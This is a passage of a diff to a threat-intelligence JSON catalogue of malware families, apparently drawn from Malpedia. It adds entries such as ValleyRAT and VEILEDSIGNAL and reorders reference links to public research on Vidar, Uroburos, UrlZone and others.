"https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e83a3731-9c84-4e36-a2da-9e6c9c2461d7", + "value": "Unidentified 107 (APT29)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108", + "https://www.virustotal.com/gui/file/8c94a3cef4e45a1db05ae9723ce5f5ed66fc57316e9868f66c995ebee55f5117/detection" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee09eba1-e96e-476f-9372-e99218d8ab90", + "value": "Unidentified 108" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109", + "https://twitter.com/malwrhunterteam/status/1689533484597952514" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ad37d6ad-e9b7-4652-8a2e-502b170932e7", + "value": "Unidentified 109 (Lazarus?)" + }, + { + "description": "According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110", + "https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00dac929-3038-4fc1-a1a5-0fd895126e92", + "value": "Unidentified 110 (RustyFlag)" + }, { "description": "", "meta": { @@ -49170,11 +51548,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", - "https://secrary.com/ReversingMalware/Upatre/", "https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/", + "https://secrary.com/ReversingMalware/Upatre/", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/" + "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/" ], "synonyms": [], "type": [] @@ -49199,20 +51577,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", - "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", + "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", + "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", + "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware" ], "synonyms": [ "Bebloh", @@ -49228,23 +51606,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", - "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", - "https://artemonsecurity.com/snake_whitepaper.pdf", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/", - "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://www.circl.lu/pub/tr-25/", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://exatrack.com/public/Uroburos_EN.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", - "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", - "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://artemonsecurity.com/uroburos.pdf", + "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", + "https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/", + "https://exatrack.com/public/Uroburos_EN.pdf", + "https://artemonsecurity.com/snake_whitepaper.pdf", + "https://www.circl.lu/pub/tr-25/", + "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", - "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots" + "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], "synonyms": [ "Snake" @@ -49259,9 +51638,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view" + "https://securelist.com/cycldek-bridging-the-air-gap/97157/" ], "synonyms": [], "type": [] @@ -49274,9 +51653,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry", + "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf" ], "synonyms": [], "type": [] @@ -49289,8 +51668,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist", - "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/", - "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf", + "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/" ], "synonyms": [], "type": [] @@ -49311,14 +51690,28 @@ "uuid": "006621d1-a3bd-40f2-a55c-d79c84879a6b", "value": "Vaggen" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape", + "https://www.secrss.com/articles/52018" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fcf8f520-27a9-493e-a274-fbfd70b733b0", + "value": "ValleyRAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault", - "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], "type": [] @@ -49344,8 +51737,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns", + "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58" ], "synonyms": [ @@ -49361,8 +51754,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky", - "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/", - "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/" + "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", + "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/" ], "synonyms": [], "type": [] @@ -49375,17 +51768,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", - "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", - "https://medium.com/@Ilandu/vawtrak-malware-824818c1837", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", - "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", + "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", + "https://medium.com/@Ilandu/vawtrak-malware-824818c1837", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest", "https://www.secureworks.com/research/dyre-banking-trojan", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ @@ -49418,8 +51811,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker", - "https://twitter.com/malwrhunterteam/status/1095024267459284992", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://twitter.com/malwrhunterteam/status/1095024267459284992", "https://twitter.com/malwrhunterteam/status/1093136163836174339", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/", "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618" @@ -49433,6 +51826,19 @@ "uuid": "704bb00f-f558-4568-824c-847523700043", "value": "VegaLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b75f0dfd-15df-439d-8ff0-8e8f87656565", + "value": "VEILEDSIGNAL" + }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { @@ -49465,8 +51871,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom", "https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/", - "https://blog.malwarelab.pl/posts/venom/", - "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html" + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://blog.malwarelab.pl/posts/venom/" ], "synonyms": [], "type": [] @@ -49480,10 +51886,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", - "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", "https://www.esentire.com/web-native-pages/unmasking-venom-spider", - "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", + "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire" ], "synonyms": [], "type": [] @@ -49522,8 +51928,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", - "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/" ], "synonyms": [], @@ -49550,12 +51956,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware", - "https://twitter.com/GrujaRS/status/1241657443282825217", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://twitter.com/GrujaRS/status/1241657443282825217", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html" ], "synonyms": [], "type": [] @@ -49564,14 +51970,14 @@ "value": "VHD Ransomware" }, { - "description": "VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted.\r\nThis cryptojacking malware was specialized in Monero (XRM) cryptocurrency.", + "description": "VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted.\r\nThis cryptojacking malware was specialized in Monero (XRM) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate", + "https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/", "https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/", - "https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/", "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", - "https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/" + "https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/" ], "synonyms": [], "type": [] @@ -49584,59 +51990,64 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", - "https://isc.sans.edu/diary/rss/28468", + "https://twitter.com/GroupIB_GIB/status/1570821174736850945", + "https://asec.ahnlab.com/en/30445/", + "https://cert.pl/en/posts/2021/10/vidar-campaign/", + "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing", + "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader", "https://ke-la.com/information-stealers-a-new-landscape/", - "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/", - "https://blog.jaalma.io/vidar-infostealer-analysis/", - "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", - "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", - "https://intel471.com/blog/privateloader-malware", + "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google", + "https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back", + "https://threatpost.com/microsoft-help-files-vidar-malware/179078/", + "https://eln0ty.github.io/malware%20analysis/vidar/", + "https://isc.sans.edu/diary/rss/28468", + "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/", + "https://asec.ahnlab.com/en/30875/", + "https://asec.ahnlab.com/en/22932/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", + "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", + "https://blog.jaalma.io/vidar-infostealer-analysis/", + "https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", "https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/", "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", - "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", - "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/", - "https://twitter.com/GroupIB_GIB/status/1570821174736850945", - "https://eln0ty.github.io/malware%20analysis/vidar/", - "https://asec.ahnlab.com/ko/25837/", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign", - "https://asec.ahnlab.com/en/22932/", - "https://asec.ahnlab.com/en/30445/", - "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/", - "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/", - "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal", - "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/", - "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", - "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed", - "https://asec.ahnlab.com/en/30875/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://twitter.com/sisoma2/status/1409816282065743872", - "https://cert.pl/en/posts/2021/10/vidar-campaign/", - "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", - "https://www.youtube.com/watch?v=lxdlNOaHJQA", - "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html", - "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing", - "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure", - "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", - "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://intel471.com/blog/privateloader-malware", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://www.youtube.com/watch?v=lxdlNOaHJQA", "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", - "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google", - "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk", - "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/", - "https://www.youtube.com/watch?v=NI_Yw2t9zoo", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign", "https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", + "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/", + "https://twitter.com/sisoma2/status/1409816282065743872", + "https://asec.ahnlab.com/ko/25837/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-vidar-stealer", + "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", "https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer", - "https://threatpost.com/microsoft-help-files-vidar-malware/179078/" + "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html", + "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/", + "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://www.youtube.com/watch?v=NI_Yw2t9zoo", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -49649,10 +52060,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner", - "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/", - "https://blog.trendmicro.co.jp/archives/28319", "https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games", + "https://blog.trendmicro.co.jp/archives/28319", "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/", + "https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/", "https://www.mbsd.jp/research/20210721/blog/" ], "synonyms": [ @@ -49681,11 +52092,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock", - "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017", "https://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/", "https://blogs.blackberry.com/en/2019/07/threat-spotlight-virlock-polymorphic-ransomware", - "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/" + "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/", + "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf" ], "synonyms": [], "type": [] @@ -49712,12 +52123,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://www.secureworks.com/research/virut-encryption-analysis", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", "https://chrisdietri.ch/post/virut-resurrects/", - "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", - "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/", 